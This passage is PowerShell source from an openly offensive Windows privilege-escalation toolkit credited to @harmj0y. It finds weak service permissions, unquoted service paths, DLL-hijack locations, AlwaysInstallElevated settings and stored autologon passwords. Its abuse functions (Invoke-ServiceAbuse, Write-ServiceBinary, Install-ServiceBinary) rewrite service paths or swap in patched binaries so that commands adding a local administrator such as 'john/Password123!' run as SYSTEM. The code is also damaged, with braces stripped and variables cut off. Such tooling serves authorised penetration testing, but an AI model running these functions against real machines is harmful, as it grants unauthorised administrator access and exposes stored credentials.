if($PermissionSet -eq 'ChangeConfig') {
$TargetPermissions = @('ChangeConfig', 'WriteDac', 'WriteOwner', 'GenericAll', ' GenericWrite', 'AllAccess')
elseif($PermissionSet -eq 'Restart') {
$TargetPermissions = @('Start', 'Stop')
$CheckAllPermissionsInSet = $True # so we check all permissions && style
elseif($PermissionSet -eq 'AllAccess') {
$TargetPermissions = @('GenericAll', 'AllAccess')
ForEach($IndividualService in $Name) {
$TargetService = $IndividualService | Add-ServiceDacl
if($TargetService -and $TargetService.Dacl) {
# enumerate all group SIDs the current user is a part of
$UserIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$CurrentUserSids = $UserIdentity.Groups | Select-Object -ExpandProperty Value
$CurrentUserSids += $UserIdentity.User.Value
ForEach($ServiceDacl in $TargetService.Dacl) {
if($CurrentUserSids -contains $ServiceDacl.SecurityIdentifier) {
if($CheckAllPermissionsInSet) {
$AllMatched = $True
ForEach($TargetPermission in $TargetPermissions) {
# check permissions && style
if (($ServiceDacl.AccessRights -band $AccessMask[$TargetPermission]) -ne $AccessMask[$TargetPermission]) {
# Write-Verbose "Current user doesn't have '$TargetPermission' for $($TargetService.Name)"
$AllMatched = $False
if($AllMatched) {
else {
ForEach($TargetPermission in $TargetPermissions) {
# check permissions || style
if (($ServiceDacl.AceType -eq 'AccessAllowed') -and ($ServiceDacl.AccessRights -band $AccessMask[$TargetPermission]) -eq $AccessMask[$TargetPermission]) {
Write-Verbose "Current user has '$TargetPermission' for $IndividualService"
else {
Write-Verbose "Error enumerating the Dacl for service $IndividualService"
# Service enumeration
function Get-ServiceUnquoted {
Returns the name and binary path for services with unquoted paths
that also have a space in the name.
PS C:\> $services = Get-ServiceUnquoted
Get a set of potentially exploitable services.
[CmdletBinding()] param()
# find all paths to service .exe's that have a space in the path and aren't quoted
$VulnServices = Get-WmiObject -Class win32_service | Where-Object {$_} | Where-Object {($_.pathname -ne $null) -and ($_.pathname.trim() -ne '')} | Where-Object { (-not $_.pathname.StartsWith("`"")) -and (-not $_.pathname.StartsWith("'"))} | Where-Object {($_.pathname.Substring(0, $_.pathname.ToLower().IndexOf(".exe") + 4)) -match ".* .*"}
if ($VulnServices) {
ForEach ($Service in $VulnServices) {
$ModifiableFiles = $Service.pathname.split(' ') | Get-ModifiablePath
$ModifiableFiles | Where-Object {$_ -and $_.ModifiablePath -and ($_.ModifiablePath -ne '')} | Foreach-Object {
$ServiceRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $
if($ServiceRestart) {
$CanRestart = $True
else {
$CanRestart = $False
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'ServiceName' $
$Out | Add-Member Noteproperty 'Path' $Service.pathname
$Out | Add-Member Noteproperty 'ModifiablePath' $_
$Out | Add-Member Noteproperty 'StartName' $Service.startname
$Out | Add-Member Noteproperty 'AbuseFunction' "Write-ServiceBinary -Name '$($' -Path <HijackPath>"
$Out | Add-Member Noteproperty 'CanRestart' $CanRestart
function Get-ModifiableServiceFile {
Enumerates all services and returns vulnerable service files.
Enumerates all services by querying the WMI win32_service class. For each service,
it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine
if the current user has rights to modify the service binary itself or any associated
arguments. If the associated binary (or any configuration files) can be overwritten,
privileges may be able to be escalated.
PS C:\> Get-ModifiableServiceFile
Get a set of potentially exploitable service binares/config files.
[CmdletBinding()] param()
Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pathname} | ForEach-Object {
$ServiceName = $
$ServicePath = $_.pathname
$ServiceStartName = $_.startname
$ServicePath | Get-ModifiablePath | ForEach-Object {
$ServiceRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $ServiceName
if($ServiceRestart) {
$CanRestart = $True
else {
$CanRestart = $False
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'ServiceName' $ServiceName
$Out | Add-Member Noteproperty 'Path' $ServicePath
$Out | Add-Member Noteproperty 'ModifiableFile' $_.ModifiablePath
$Out | Add-Member Noteproperty 'ModifiableFilePermissions' $_.Permissions
$Out | Add-Member Noteproperty 'ModifiableFileIdentityReference' $_.IdentityReference
$Out | Add-Member Noteproperty 'StartName' $ServiceStartName
$Out | Add-Member Noteproperty 'AbuseFunction' "Install-ServiceBinary -Name '$ServiceName'"
$Out | Add-Member Noteproperty 'CanRestart' $CanRestart
function Get-ModifiableService {
Enumerates all services and returns services for which the current user can modify the binPath.
Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if
the current user has rights to change the service configuration.
PS C:\> Get-ModifiableService
Get a set of potentially exploitable services.
[CmdletBinding()] param()
Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeConfig' | ForEach-Object {
$ServiceDetails = $_ | Get-ServiceDetail
$ServiceRestart = $_ | Test-ServiceDaclPermission -PermissionSet 'Restart'
if($ServiceRestart) {
$CanRestart = $True
else {
$CanRestart = $False
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'ServiceName' $
$Out | Add-Member Noteproperty 'Path' $ServiceDetails.pathname
$Out | Add-Member Noteproperty 'StartName' $ServiceDetails.startname
$Out | Add-Member Noteproperty 'AbuseFunction' "Invoke-ServiceAbuse -Name '$($'"
$Out | Add-Member Noteproperty 'CanRestart' $CanRestart
function Get-ServiceDetail {
Returns detailed information about a specified service by querying the
WMI win32_service class for the specified service name.
Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on
the pipeline object returned by Get-Service, extracts out the service name, queries the
WMI win32_service class for the specified service for details like binPath, and outputs
An array of one or more service names to query information for.
PS C:\> Get-ServiceDetail -Name VulnSVC
Gets detailed information about the 'VulnSVC' service.
PS C:\> Get-Service VulnSVC | Get-ServiceDetail
Gets detailed information about the 'VulnSVC' service.
param (
[Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
ForEach($IndividualService in $Name) {
$TargetService = Get-Service -Name $IndividualService
Get-WmiObject -Class win32_service -Filter "Name='$($TargetService.Name)'" | Where-Object {$_} | ForEach-Object {
try {
Write-Verbose "Error: $_"
# Service abuse
function Invoke-ServiceAbuse {
Abuses a function the current user has configuration rights on in order
to add a local administrator or execute a custom command.
Author: @harmj0y
License: BSD 3-Clause
Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current
user has configuration modification rights on and executes a series of automated actions to
execute commands as SYSTEM. First, the service is enabled if it was set as disabled and the
original service binary path and configuration state are preserved. Then the service is stopped
and the Set-ServiceBinPath function is used to set the binary (binPath) for the service to a
series of commands, the service is started, stopped, and the next command is configured. After
completion, the original service configuration is restored and a custom object is returned
that captures the service abused and commands run.
An array of one or more service names to abuse.
The [domain\]username to add. If not given, it defaults to "john".
Domain users are not created, only added to the specified localgroup.
The password to set for the added user. If not given, it defaults to "Password123!"
Local group name to add the user to (default of 'Administrators').
.PARAMETER Credential
A [Management.Automation.PSCredential] object specifying the user/password to add.
Custom command to execute instead of user creation.
Switch. Force service stopping, even if other services are dependent.
PS C:\> Invoke-ServiceAbuse -Name VulnSVC
Abuses service 'VulnSVC' to add a localuser "john" with password
"Password123! to the machine and local administrator group
PS C:\> Get-Service VulnSVC | Invoke-ServiceAbuse
Abuses service 'VulnSVC' to add a localuser "john" with password
"Password123! to the machine and local administrator group
PS C:\> Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john"
Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the
local adminisrtators group.
PS C:\> Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users"
Abuses service 'VulnSVC' to add a localuser "backdoor" with password
"password" to the machine and local "Power Users" group
PS C:\> Invoke-ServiceAbuse -Name VulnSVC -Command "net ..."
Abuses service 'VulnSVC' to execute a custom command.
param (
[Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
$UserName = 'john',
$Password = 'Password123!',
$LocalGroup = 'Administrators',
if($PSBoundParameters['Command']) {
$ServiceCommands = @($Command)
else {
if($PSBoundParameters['Credential']) {
$UserNameToAdd = $Credential.UserName
$PasswordToAdd = $Credential.GetNetworkCredential().Password
else {
$UserNameToAdd = $UserName
$PasswordToAdd = $Password
if($UserNameToAdd.Contains('\')) {
# only adding a domain user to the local group, no user creation
$ServiceCommands = @("net localgroup $LocalGroup $UserNameToAdd /add")
else {
# create a local user and add it to the local specified group
$ServiceCommands = @("net user $UserNameToAdd $PasswordToAdd /add", "net localgroup $LocalGroup $UserNameToAdd /add")
ForEach($IndividualService in $Name) {
$TargetService = Get-Service -Name $IndividualService
$ServiceDetails = $TargetService | Get-ServiceDetail
$RestoreDisabled = $False
if ($ServiceDetails.StartMode -match 'Disabled') {
Write-Verbose "Service '$(ServiceDetails.Name)' disabled, enabling..."
$TargetService | Set-Service -StartupType Manual -ErrorAction Stop
$RestoreDisabled = $True
$OriginalServicePath = $ServiceDetails.PathName
$OriginalServiceState = $ServiceDetails.State
Write-Verbose "Service '$($TargetService.Name)' original path: '$OriginalServicePath'"
Write-Verbose "Service '$($TargetService.Name)' original state: '$OriginalServiceState'"
ForEach($ServiceCommand in $ServiceCommands) {
if($PSBoundParameters['Force']) {
$TargetService | Stop-Service -Force -ErrorAction Stop
else {
$TargetService | Stop-Service -ErrorAction Stop
Write-Verbose "Executing command '$ServiceCommand'"
$Success = $TargetService | Set-ServiceBinPath -binPath "$ServiceCommand"
if (-not $Success) {
throw "Error reconfiguring the binPath for $($TargetService.Name)"
$TargetService | Start-Service -ErrorAction SilentlyContinue
Start-Sleep -Seconds 2
if($PSBoundParameters['Force']) {
$TargetService | Stop-Service -Force -ErrorAction Stop
else {
$TargetService | Stop-Service -ErrorAction Stop
Write-Verbose "Restoring original path to service '$($TargetService.Name)'"
Start-Sleep -Seconds 1
$Success = $TargetService | Set-ServiceBinPath -binPath "$OriginalServicePath"
if (-not $Success) {
throw "Error restoring the original binPath for $($TargetService.Name)"
# try to restore the service to whatever the service's original state was
if($RestoreDisabled) {
Write-Verbose "Re-disabling service '$($TargetService.Name)'"
$TargetService | Set-Service -StartupType Disabled -ErrorAction Stop
elseif($OriginalServiceState -eq "Paused") {
Write-Verbose "Starting and then pausing service '$($TargetService.Name)'"
$TargetService | Start-Service
Start-Sleep -Seconds 1
$TargetService | Set-Service -Status Paused -ErrorAction Stop
elseif($OriginalServiceState -eq "Stopped") {
Write-Verbose "Leaving service '$($TargetService.Name)' in stopped state"
else {
Write-Verbose "Restarting '$($TargetService.Name)'"
$TargetService | Start-Service
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'ServiceAbused' $TargetService.Name
$Out | Add-Member Noteproperty 'Command' $($ServiceCommands -join ' && ')
function Write-ServiceBinary {
Patches in the specified command to a pre-compiled C# service executable and
writes the binary out to the specified ServicePath location.
Author: @harmj0y
License: BSD 3-Clause
Takes a pre-compiled C# service binary and patches in the appropriate commands needed
for service abuse. If a -UserName/-Password or -Credential is specified, the command
patched in creates a local user and adds them to the specified -LocalGroup, otherwise
the specified -Command is patched in. The binary is then written out to the specified
-ServicePath. Either -Name must be specified for the service, or a proper object from
Get-Service must be passed on the pipeline in order to patch in the appropriate service
name the binary will be running under.
The service name the EXE will be running under.
The [domain\]username to add. If not given, it defaults to "john".
Domain users are not created, only added to the specified localgroup.
The password to set for the added user. If not given, it defaults to "Password123!"
Local group name to add the user to (default of 'Administrators').
.PARAMETER Credential
A [Management.Automation.PSCredential] object specifying the user/password to add.
Custom command to execute instead of user creation.
Path to write the binary out to, defaults to 'service.exe' in the local directory.
PS C:\> Write-ServiceBinary -Name VulnSVC
Writes a service binary to service.exe in the local directory for VulnSVC that
adds a local Administrator (john/Password123!).
PS C:\> Get-Service VulnSVC | Write-ServiceBinary
Writes a service binary to service.exe in the local directory for VulnSVC that
adds a local Administrator (john/Password123!).
PS C:\> Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
Writes a service binary to service.exe in the local directory for VulnSVC that adds
TESTLAB\john to the Administrators local group.
PS C:\> Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
Writes a service binary to service.exe in the local directory for VulnSVC that
adds a local Administrator (backdoor/Password123!).
PS C:\> Write-ServiceBinary -Name VulnSVC -Command "net ..."
Writes a service binary to service.exe in the local directory for VulnSVC that
executes a custom command.
[Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
$UserName = 'john',
$Password = 'Password123!',
$LocalGroup = 'Administrators',
$Path = "$(Convert-Path .)\service.exe"
# the raw unpatched service binary
[Byte[]] $Binary = [Byte[]][Convert]::FromBase64String($B64Binary)
if($PSBoundParameters['Command']) {
$ServiceCommand = $Command
else {
if($PSBoundParameters['Credential']) {
$UserNameToAdd = $Credential.UserName
$PasswordToAdd = $Credential.GetNetworkCredential().Password
else {
$UserNameToAdd = $UserName
$PasswordToAdd = $Password
if($UserNameToAdd.Contains('\')) {
# only adding a domain user to the local group, no user creation
$ServiceCommand = "net localgroup $LocalGroup $UserNameToAdd /add"
else {
# create a local user and add it to the local specified group
$ServiceCommand = "net user $UserNameToAdd $PasswordToAdd /add && timeout /t 5 && net localgroup $LocalGroup $UserNameToAdd /add"
$TargetService = Get-Service -Name $Name
# get the unicode byte conversions of all arguments
$Enc = [System.Text.Encoding]::Unicode
$ServiceNameBytes = $Enc.GetBytes($TargetService.Name)
$CommandBytes = $Enc.GetBytes($ServiceCommand)
# patch all values in to their appropriate locations
for ($i=0; $i -lt ($ServiceNameBytes.Length); $i++) {
# service name offset = 2458
$Binary[$i+2458] = $ServiceNameBytes[$i]
for ($i=0; $i -lt ($CommandBytes.Length); $i++) {
# cmd offset = 2535
$Binary[$i+2535] = $CommandBytes[$i]
Set-Content -Value $Binary -Encoding Byte -Path $Path -Force -ErrorAction Stop
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'ServiceName' $TargetService.Name
$Out | Add-Member Noteproperty 'Path' $Path
$Out | Add-Member Noteproperty 'Command' $ServiceCommand
function Install-ServiceBinary {
Replaces the service binary for the specified service with one that executes
a specified command as SYSTEM.
Author: @harmj0y
License: BSD 3-Clause
Takes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the
current user can modify the associated service binary listed in the binPath. Backs up
the original service binary to "OriginalService.exe.bak" in service binary location,
and then uses Write-ServiceBinary to create a C# service binary that either adds
a local administrator user or executes a custom command. The new service binary is
replaced in the original service binary path, and a custom object is returned that
captures the original and new service binary configuration.
The service name the EXE will be running under.
The [domain\]username to add. If not given, it defaults to "john".
Domain users are not created, only added to the specified localgroup.
The password to set for the added user. If not given, it defaults to "Password123!"
Local group name to add the user to (default of 'Administrators').
.PARAMETER Credential
A [Management.Automation.PSCredential] object specifying the user/password to add.
Custom command to execute instead of user creation.
PS C:\> Install-ServiceBinary -Name VulnSVC
Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
for VulnSVC with one that adds a local Administrator (john/Password123!).
PS C:\> Get-Service VulnSVC | Install-ServiceBinary
Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
for VulnSVC with one that adds a local Administrator (john/Password123!).
PS C:\> Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
for VulnSVC with one that adds TESTLAB\john to the Administrators local group.
PS C:\> Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
for VulnSVC with one that adds a local Administrator (backdoor/Password123!).
PS C:\> Install-ServiceBinary -Name VulnSVC -Command "net ..."
Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
for VulnSVC with one that executes a custom command.
[Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
$UserName = 'john',
$Password = 'Password123!',
$LocalGroup = 'Administrators',
if($PSBoundParameters['Command']) {
$ServiceCommand = $Command
else {
if($PSBoundParameters['Credential']) {
$UserNameToAdd = $Credential.UserName
$PasswordToAdd = $Credential.GetNetworkCredential().Password
else {
$UserNameToAdd = $UserName
$PasswordToAdd = $Password
if($UserNameToAdd.Contains('\')) {
# only adding a domain user to the local group, no user creation
$ServiceCommand = "net localgroup $LocalGroup $UserNameToAdd /add"
else {
# create a local user and add it to the local specified group
$ServiceCommand = "net user $UserNameToAdd $PasswordToAdd /add && timeout /t 5 && net localgroup $LocalGroup $UserNameToAdd /add"
$TargetService = Get-Service -Name $Name
$ServiceDetails = $TargetService | Get-ServiceDetail
$ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -LiteralPaths
if(-not $ModifiableFiles) {
throw "Service binary '$($ServiceDetails.PathName)' for service $($ServiceDetails.Name) not modifiable by the current user."
$ServicePath = $ModifiableFiles | Select-Object -First 1 | Select-Object -ExpandProperty ModifiablePath
$BackupPath = "$($ServicePath).bak"
Write-Verbose "Backing up '$ServicePath' to '$BackupPath'"
try {
Copy-Item -Path $ServicePath -Destination $BackupPath -Force
catch {
Write-Warning "Error backing up '$ServicePath' : $_"
$Result = Write-ServiceBinary -Name $ServiceDetails.Name -Command $ServiceCommand -Path $ServicePath
$Result | Add-Member Noteproperty 'BackupPath' $BackupPath
function Restore-ServiceBinary {
Restores a service binary backed up by Install-ServiceBinary.
Takes a service Name or a ServiceProcess.ServiceController on the pipeline and
checks for the existence of an "OriginalServiceBinary.exe.bak" in the service
binary location. If it exists, the backup binary is restored to the original
binary path.
The service name to restore a binary for.
Optional manual path to the backup binary.
PS C:\> Restore-ServiceBinary -Name VulnSVC
Restore the original binary for the service 'VulnSVC'.
PS C:\> Get-Service VulnSVC | Restore-ServiceBinary
Restore the original binary for the service 'VulnSVC'.
PS C:\> Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe'
Restore the original binary for the service 'VulnSVC' from a custom location.
[Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
[Parameter(Position = 1)]
[ValidateScript({Test-Path -Path $_ })]
$TargetService = Get-Service -Name $Name
$ServiceDetails = $TargetService | Get-ServiceDetail
$ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -LiteralPaths
if(-not $ModifiableFiles) {
throw "Service binary '$($ServiceDetails.PathName)' for service $($ServiceDetails.Name) not modifiable by the current user."
$ServicePath = $ModifiableFiles | Select-Object -First 1 | Select-Object -ExpandProperty ModifiablePath
$BackupPath = "$($ServicePath).bak"
Copy-Item -Path $BackupPath -Destination $ServicePath -Force
Remove-Item -Path $BackupPath -Force
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'ServiceName' $ServiceDetails.Name
$Out | Add-Member Noteproperty 'ServicePath' $ServicePath
$Out | Add-Member Noteproperty 'BackupPath' $BackupPath
# DLL Hijacking
function Find-ProcessDLLHijack {
Finds all DLL hijack locations for currently running processes.
Author: @harmj0y
License: BSD 3-Clause
Enumerates all currently running processes with Get-Process (or accepts an
input process object from Get-Process) and enumerates the loaded modules for each.
All loaded module name exists outside of the process binary base path, as those
are DLL load-order hijack candidates.
The name of a process to enumerate for possible DLL path hijack opportunities.
.PARAMETER ExcludeWindows
Exclude paths from C:\Windows\* instead of just C:\Windows\System32\*
.PARAMETER ExcludeProgramFiles
Exclude paths from C:\Program Files\* and C:\Program Files (x86)\*
.PARAMETER ExcludeOwned
Exclude processes the current user owns.
PS C:\> Find-ProcessDLLHijack
Finds possible hijackable DLL locations for all processes.
PS C:\> Get-Process VulnProcess | Find-ProcessDLLHijack
Finds possible hijackable DLL locations for the 'VulnProcess' processes.
PS C:\> Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles
Finds possible hijackable DLL locations not in C:\Windows\* and
not in C:\Program Files\* or C:\Program Files (x86)\*
PS C:\> Find-ProcessDLLHijack -ExcludeOwned
Finds possible hijackable DLL location for processes not owned by the
current user.
[Parameter(Position=0, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
$Name = $(Get-Process | Select-Object -Expand Name),
# the known DLL cache to exclude from our findings
$Keys = (Get-Item "HKLM:\System\CurrentControlSet\Control\Session Manager\KnownDLLs")
$KnownDLLs = $(ForEach ($KeyName in $Keys.GetValueNames()) { $Keys.GetValue($KeyName) }) | Where-Object { $_.EndsWith(".dll") }
$CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
# get the owners for all processes
$Owners = @{}
Get-WmiObject -Class win32_process | Where-Object {$_} | ForEach-Object { $Owners[$_.handle] = $_.getowner().user }
ForEach ($ProcessName in $Name) {
$TargetProcess = Get-Process -Name $ProcessName
if($TargetProcess -and $TargetProcess.Path -and ($TargetProcess.Path -ne '') -and ($TargetProcess.Path -ne $Null)) {
try {
$BasePath = $TargetProcess.Path | Split-Path -Parent
$LoadedModules = $TargetProcess.Modules
$ProcessOwner = $Owners[$TargetProcess.Id.ToString()]
ForEach ($Module in $LoadedModules){
$ModulePath = "$BasePath\$($Module.ModuleName)"
# if the module path doesn't exist in the process base path folder
if ((-not $ModulePath.Contains('C:\Windows\System32')) -and (-not (Test-Path -Path $ModulePath)) -and ($KnownDLLs -NotContains $Module.ModuleName)) {
$Exclude = $False
if($PSBoundParameters['ExcludeWindows'] -and $ModulePath.Contains('C:\Windows')) {
$Exclude = $True
if($PSBoundParameters['ExcludeProgramFiles'] -and $ModulePath.Contains('C:\Program Files')) {
$Exclude = $True
if($PSBoundParameters['ExcludeOwned'] -and $CurrentUser.Contains($ProcessOwner)) {
$Exclude = $True
# output the process name and hijackable path if exclusion wasn't marked
if (-not $Exclude){
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'ProcessName' $TargetProcess.ProcessName
$Out | Add-Member Noteproperty 'ProcessPath' $TargetProcess.Path
$Out | Add-Member Noteproperty 'ProcessOwner' $ProcessOwner
$Out | Add-Member Noteproperty 'ProcessHijackableDLL' $ModulePath
catch {
Write-Verbose "Error: $_"
function Find-PathDLLHijack {
Finds all directories in the system %PATH% that are modifiable by the current user.
Author: @harmj0y
License: BSD 3-Clause
Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath
to return the folder paths the current user can write to. On Windows 7, if wlbsctrl.dll is
written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search
order loading.
PS C:\> Find-PathDLLHijack
Finds all %PATH% .DLL hijacking opportunities.
# use -LiteralPaths so the spaces in %PATH% folders are not tokenized
Get-Item Env:Path | Select-Object -ExpandProperty Value | ForEach-Object { $_.split(';') } | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object {
$TargetPath = $_
$ModifidablePaths = $TargetPath | Get-ModifiablePath -LiteralPaths | Where-Object {$_ -and ($_ -ne $Null) -and ($_.ModifiablePath -ne $Null) -and ($_.ModifiablePath.Trim() -ne '')}
ForEach($ModifidablePath in $ModifidablePaths) {
if($ModifidablePath.ModifiablePath -ne $Null) {
$ModifidablePath | Add-Member Noteproperty '%PATH%' $_
# Registry Checks
function Get-RegistryAlwaysInstallElevated {
Checks if any of the AlwaysInstallElevated registry keys are set.
Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys
are set, $False otherwise. If one of these keys are set, then all .MSI files run with
elevated permissions, regardless of current user permissions.
PS C:\> Get-RegistryAlwaysInstallElevated
Returns $True if any of the AlwaysInstallElevated registry keys are set.
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
if (Test-Path "HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer") {
$HKLMval = (Get-ItemProperty -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue)
Write-Verbose "HKLMval: $($HKLMval.AlwaysInstallElevated)"
if ($HKLMval.AlwaysInstallElevated -and ($HKLMval.AlwaysInstallElevated -ne 0)){
$HKCUval = (Get-ItemProperty -Path "HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue)
Write-Verbose "HKCUval: $($HKCUval.AlwaysInstallElevated)"
if ($HKCUval.AlwaysInstallElevated -and ($HKCUval.AlwaysInstallElevated -ne 0)){
Write-Verbose "AlwaysInstallElevated enabled on this machine!"
Write-Verbose "AlwaysInstallElevated not enabled on this machine."
Write-Verbose "AlwaysInstallElevated not enabled on this machine."
Write-Verbose "HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer does not exist"
$ErrorActionPreference = $OrigError
function Get-RegistryAutoLogon {
Finds any autologon credentials left in the registry.
Checks if any autologon accounts/credentials are set in a number of registry locations.
If they are, the credentials are extracted and returned as a custom PSObject.
PS C:\> Get-RegistryAutoLogon
Finds any autologon credentials left in the registry.
$AutoAdminLogon = $(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -ErrorAction SilentlyContinue)
Write-Verbose "AutoAdminLogon key: $($AutoAdminLogon.AutoAdminLogon)"
if ($AutoAdminLogon -and ($AutoAdminLogon.AutoAdminLogon -ne 0)) {
$DefaultDomainName = $(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -ErrorAction SilentlyContinue).DefaultDomainName
$DefaultUserName = $(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
$DefaultPassword = $(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
$AltDefaultDomainName = $(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AltDefaultDomainName -ErrorAction SilentlyContinue).AltDefaultDomainName
$AltDefaultUserName = $(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AltDefaultUserName -ErrorAction SilentlyContinue).AltDefaultUserName
$AltDefaultPassword = $(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AltDefaultPassword -ErrorAction SilentlyContinue).AltDefaultPassword
if ($DefaultUserName -or $AltDefaultUserName) {
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'DefaultDomainName' $DefaultDomainName
$Out | Add-Member Noteproperty 'DefaultUserName' $DefaultUserName
$Out | Add-Member Noteproperty 'DefaultPassword' $DefaultPassword
$Out | Add-Member Noteproperty 'AltDefaultDomainName' $AltDefaultDomainName
$Out | Add-Member Noteproperty 'AltDefaultUserName' $AltDefaultUserName
$Out | Add-Member Noteproperty 'AltDefaultPassword' $AltDefaultPassword
function Get-ModifiableRegistryAutoRun {
Returns any elevated system autoruns in which the current user can
modify part of the path string.
Enumerates a number of autorun specifications in HKLM and filters any
autoruns through Get-ModifiablePath, returning any file/config locations
in the found path strings that the current user can modify.
PS C:\> Get-ModifiableRegistryAutoRun
Return vulneable autorun binaries (or associated configs).
$SearchLocations = @( "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
$SearchLocations | Where-Object { Test-Path $_ } | ForEach-Object {
$Keys = Get-Item -Path $_
$ParentPath = $_
ForEach ($Name in $Keys.GetValueNames()) {
$Path = $($Keys.GetValue($Name))
$Path | Get-ModifiablePath | ForEach-Object {
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'Key' "$ParentPath\$Name"
$Out | Add-Member Noteproperty 'Path' $Path
$Out | Add-Member Noteproperty 'ModifiableFile' $_
$ErrorActionPreference = $OrigError
# Miscellaneous checks
function Get-ModifiableScheduledTaskFile {
Returns scheduled tasks where the current user can modify any file
in the associated task action string.
Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks"
and parses the XML specification for each task, extracting the command triggers.
Each trigger string is filtered through Get-ModifiablePath, returning any file/config
locations in the found path strings that the current user can modify.
PS C:\> Get-ModifiableScheduledTaskFile
Return scheduled tasks with modifiable command strings.
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
$Path = "$($ENV:windir)\System32\Tasks"
# recursively enumerate all schtask .xmls
Get-ChildItem -Path $Path -Recurse | Where-Object { -not $_.PSIsContainer } | ForEach-Object {
try {
$TaskName = $_.Name
$TaskXML = [xml] (Get-Content $_.FullName)
if($TaskXML.Task.Triggers) {
$TaskTrigger = $TaskXML.Task.Triggers.OuterXML
# check schtask command
$TaskXML.Task.Actions.Exec.Command | Get-ModifiablePath | ForEach-Object {
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'TaskName' $TaskName
$Out | Add-Member Noteproperty 'TaskFilePath' $_
$Out | Add-Member Noteproperty 'TaskTrigger' $TaskTrigger
# check schtask arguments
$TaskXML.Task.Actions.Exec.Arguments | Get-ModifiablePath | ForEach-Object {
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'TaskName' $TaskName
$Out | Add-Member Noteproperty 'TaskFilePath' $_
$Out | Add-Member Noteproperty 'TaskTrigger' $TaskTrigger
catch {
Write-Verbose "Error: $_"
$ErrorActionPreference = $OrigError
function Get-UnattendedInstallFile {
Checks several locations for remaining unattended installation files,
which may have deployment credentials.
PS C:\> Get-UnattendedInstallFile
Finds any remaining unattended installation files.
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
$SearchLocations = @( "c:\sysprep\sysprep.xml",
(Join-Path $Env:WinDir "\Panther\Unattended.xml"),
